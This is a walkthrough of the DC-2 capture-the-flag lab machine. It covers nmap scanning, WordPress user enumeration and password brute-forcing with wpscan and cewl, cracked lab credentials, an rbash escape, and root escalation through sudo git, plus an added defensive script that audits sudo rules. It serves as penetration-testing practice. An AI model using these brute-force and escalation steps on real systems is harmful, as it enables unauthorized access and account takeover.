DC-2 target machine practice

DC-2 target machine

I. Penetration process

A summary of the process first; the specific steps are described in detail below:

1. Modify hosts, access the site and find FLAG1
2. Generate a password dictionary for the website with the cewl tool, brute-force the passwords with wpscan to obtain the jerry and tom account passwords, log in to the backend to get FLAG2
3. A port scan finds the ssh service open on port 7744; log in with the brute-forced account passwords, tom logs in successfully, and flag3 is found in tom's home directory
4. Bypass the rbash restriction on tom and switch to the jerry user; flag4 is found in jerry's home directory
5. Use the jerry user to escalate privileges via git, enter the root directory and find final_flag

II. Starting the experiment

Step 1: Host discovery

[nmap 192.168.139.0/24]

Step 2: Port scan

[nmap -A -p- 192.168.139.132]
[The target has ports 80 and 7744 open; port 7744 is ssh, and the web site on port 80 requires modifying hosts before the page can be accessed]

Step 3: Access port 80

[Modify /etc/hosts and add the following line:]
FLAG1 found: it hints at cewl

--------------

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

**If you can’t find it, log in as another.**
------------

Step 4: Scan the website

[nikto -h dc-2]
[apt-get install gcc git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev] - several packages need to be installed first
[wpscan --update] - update the database before running (if the update fails, retry until it succeeds)
[wpscan --url dc-2 -eu] - enumerate the platform's user login names

Step 5: Brute-force the passwords

[cewl dc-2 > /tmp/password.list] - generate the password dictionary
[vim /tmp/user.list] - write the enumerated user names into a user list
[wpscan --url dc-2 -U /tmp/user.list -P /tmp/password.list] - takes roughly two minutes
Cracked:
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

Step 6: Access the backend

Step 6: ssh login
[ssh jerry@dc-2 -p 7744]
[ssh tom@dc-2 -p 7744]
tom's command interpreter turns out to be restricted

tom's account is confined by rbash and can only use four commands: ls, less, scp and vi
flag3.txt is in tom's home directory

---------------
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
-------------

Step 7: Bypass rbash

[ls usr/bin] - view the commands the current user is allowed to use
[vi /etc/passwd]
[BASH_CMDS[a]=/bin/bash]
[a] - equivalent to invoking /bin/bash through the name a
After /bin/bash has been invoked, set the commands this interpreter can run:
[PATH=$PATH:/usr/bin:/bin] - all ordinary-user commands are now usable

Step 8: Switch to the jerry user

[su jerry]
[cd]
[ls]
[cat flag4.txt]

---------------------
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - **git outta** here!!!!
---------------------

Step 9: Privilege escalation via git

[git --help]
[sudo -l]

----------
User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
------------

Then use git to open an interactive window and execute a command from it to escalate privileges

[sudo git -p --help]
[passwd root] - enter the new password
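As an added example (not from the original post), a small Python audit that parses `sudo -l` output like the block above and flags rules that let a user run, as root, a binary that can hand over a shell through its pager or editor. The sample output is constructed from the writeup's finding, and the list of shell-capable binaries is an assumption drawn from the commands this writeup mentions.

```python
import re

# Binaries that can open a pager or editor and so give the caller an
# interactive shell when run via sudo. Assumption: a short list built from
# the commands seen in this writeup (git's help pager did the job here).
SHELL_CAPABLE = {"git", "vi", "vim", "less", "more"}

# Constructed sample of `sudo -l` output, mirroring the writeup's finding.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/apt-get
"""

# One rule line: "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (user, [(runas, tags, command), ...]) parsed from `sudo -l` text."""
    user, rules, in_rules = None, [], False
    for line in text.splitlines():
        m = re.match(r"^User (\S+) may run the following commands", line)
        if m:
            user, in_rules = m.group(1), True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas"), tags, cmd.strip()))
    return user, rules


def risky_rules(text):
    """Flag rules that run a shell-capable binary as root; note NOPASSWD ones."""
    user, rules = parse_sudo_l(text)
    findings = []
    for runas, tags, cmd in rules:
        binary = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the command
        if runas in ("root", "ALL") and binary in SHELL_CAPABLE:
            findings.append({"user": user, "binary": binary, "command": cmd,
                             "nopasswd": "NOPASSWD" in tags})
    return findings
```

Run over real `sudo -l` output, a non-empty result is a rule to remove or to narrow to a specific, non-interactive subcommand.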

Step 10: Get the final flag


Origin blog.csdn.net/qq_41901122/article/details/103800733